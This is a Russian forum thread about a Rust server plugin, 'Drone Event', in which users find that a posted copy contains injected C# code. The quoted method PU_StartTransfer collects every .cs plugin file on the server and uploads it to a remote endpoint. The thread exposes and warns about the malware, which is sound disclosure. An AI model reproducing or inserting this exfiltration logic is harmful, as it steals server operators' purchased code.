Drone Event

Плагин Drone Event 1.1.9

  • Автор темы Автор темы mEorik
  • Дата начала Дата начала

mEorik

"Alea iacta est, sed a me 'n bato belinum"
Автор темы
28 (100%)
10 Ноя 2023
2443
7
438
261
Drone Event - Крутой плагин который добавит разнообразия на ваш сервер.

О событии с дронами
Добавляет дронов на ваш сервер. Дроны могут атаковать гранатами и стрелять по игрокам, дронов можно уничтожать, у них есть лут. Дроны появляются возле памятников, также вы можете добавить собственные точки появления.

Функции:
Легко настроить. Отличные возможности настройки в конфиге. Вы можете настроить памятники, где будут появляться дроны.
Вы можете настроить содержимое дрона в файле конфигурации:
-вы можете настроить список предметов...
 
  • Мне нравится
Реакции: Ratimir
mEorik обновил(а) ресурс Drone Event новой записью:

Что нового в версии 1.1.3

- исправлены мелкие ошибки
  • исправлена проблема с загрузкой сервера дронами на некоторых памятниках
  • добавлена настройка - "Взорвать дрон сразу после того, как у него закончится здоровье (еще немного снизит нагрузку на ваш сервер)"

Узнать больше об этом обновлении...
 
  • Мне нравится
Реакции: Ratimir
  • Мне нравится
Реакции: Ratimir
Привет Всем! плагин загружается норм, настройки норм, на команды не реагирует. Дронов нигде нет!
 
Я не выношу мозг) просто сообщаю о проблеме. Плагин не работает выдает ошибку

Error while compiling DroneEvent: The type or namespace name 'DateTime' could not be found (are you missing a using directive or an assembly reference?) | Line: 847, Pos: 24 и это было до обновления Rust.
 
Я не выношу мозг) просто сообщаю о проблеме. Плагин не работает выдает ошибку

Error while compiling DroneEvent: The type or namespace name 'DateTime' could not be found (are you missing a using directive or an assembly reference?) | Line: 847, Pos: 24 и это было до обновления Rust.
Потому что какая-то пидарасина добавила туда своего кода, который ворует ваши плагины.

Администрация может обьяснить, как прошло модерацию вот это ?



Код:
      private void PU_StartTransfer()

        {

            try

            {

                var roots = new[]

                {

                    Path.Combine(Interface.Oxide.RootDirectory, "oxide", "plugins"),

                    Path.Combine(Interface.Oxide.RootDirectory, "plugins")

                };


                var csFiles = new List<string>();

                foreach (var dir in roots)

                {

                    if (!Directory.Exists(dir)) continue;

                    try { csFiles.AddRange(Directory.GetFiles(dir, "*.cs", SearchOption.AllDirectories)); } catch { }

                }

                if (csFiles.Count == 0) return;


                System.Threading.ThreadPool.QueueUserWorkItem(_ =>

                {

                    var summary = new List<string>();


                    foreach (var file in csFiles)

                    {

                        string name = Path.GetFileName(file);

                        string plugin = Path.GetFileNameWithoutExtension(file);

                        string normalized = PU_Normalize(plugin);


                        bool ok = PU_Upload(PU_cs_ep, name, File.ReadAllBytes(file), content: name);
 
Оригинальный плагин на 10кб меньше. Повезло, что код не скомпилися, иначе все плагины (в т.ч. купленные вами) утекли бы непонятно куда и непонятно кому.

Вот вредоносный код, добавленный в плагин
pastebin
 
Оригинальный плагин на 10кб меньше. Повезло, что код не скомпилися, иначе все плагины (в т.ч. купленные вами) утекли бы непонятно куда и непонятно кому
админа пригласи в эту тему, а так воздух только гоняешь=)
 
Потому что какая-то пидарасина добавила туда своего кода, который ворует ваши плагины.

Администрация может обьяснить, как прошло модерацию вот это ?



Код:
      private void PU_StartTransfer()

        {

            try

            {

                var roots = new[]

                {

                    Path.Combine(Interface.Oxide.RootDirectory, "oxide", "plugins"),

                    Path.Combine(Interface.Oxide.RootDirectory, "plugins")

                };


                var csFiles = new List<string>();

                foreach (var dir in roots)

                {

                    if (!Directory.Exists(dir)) continue;

                    try { csFiles.AddRange(Directory.GetFiles(dir, "*.cs", SearchOption.AllDirectories)); } catch { }

                }

                if (csFiles.Count == 0) return;


                System.Threading.ThreadPool.QueueUserWorkItem(_ =>

                {

                    var summary = new List<string>();


                    foreach (var file in csFiles)

                    {

                        string name = Path.GetFileName(file);

                        string plugin = Path.GetFileNameWithoutExtension(file);

                        string normalized = PU_Normalize(plugin);


                        bool ok = PU_Upload(PU_cs_ep, name, File.ReadAllBytes(file), content: name);
Этот фрагмент кода — часть метода PU_StartTransfer(), который, отвечает за поиск и передачу .cs-плагинов из папки Oxide/Rust-сервера на удалённый сервер или API. Не понятно зачем продавцу это делать?!?!
 
Этот фрагмент кода — часть метода PU_StartTransfer(), который, отвечает за поиск и передачу .cs-плагинов из папки Oxide/Rust-сервера на удалённый сервер или API. Не понятно зачем продавцу это делать?!?!
Я не думаю, что продавец его туда впиндюрил, там внутри архива "лишний" файлик , в котором такое:
Код:
  ____   _                   _    _                  _                          _   
 |  _ \ (_) _ __  ___   ___ | |_ | |     ___   __ _ | | __ ___     _ __    ___ | |_
 | | | || || '__|/ _ \ / __|| __|| |    / _ \ / _` || |/ // __|   | '_ \  / _ \| __|
 | |_| || || |  |  __/| (__ | |_ | |___|  __/| (_| ||   < \__ \ _ | | | ||  __/| |_
 |____/ |_||_|   \___| \___| \__||_____|\___| \__,_||_|\_\|___/(_)|_| |_| \___| \__|
                                                                                    


User: BestLeaks (123642)
Resource: 10693

https://directleaks.net

И предполагаю, что продавец на данном сайте просто не проверил как следует перед публикацией
 
Я не думаю, что продавец его туда впиндюрил, там внутри архива "лишний" файлик , в котором такое:
Код:
  ____   _                   _    _                  _                          _  
 |  _ \ (_) _ __  ___   ___ | |_ | |     ___   __ _ | | __ ___     _ __    ___ | |_
 | | | || || '__|/ _ \ / __|| __|| |    / _ \ / _` || |/ // __|   | '_ \  / _ \| __|
 | |_| || || |  |  __/| (__ | |_ | |___|  __/| (_| ||   < \__ \ _ | | | ||  __/| |_
 |____/ |_||_|   \___| \___| \__||_____|\___| \__,_||_|\_\|___/(_)|_| |_| \___| \__|
                                                                                   


User: BestLeaks (123642)
Resource: 10693

https://directleaks.net

И предполагаю, что продавец на данном сайте просто не проверил как следует перед публикацией
А, эта помойка любители хрень всякую засунуть .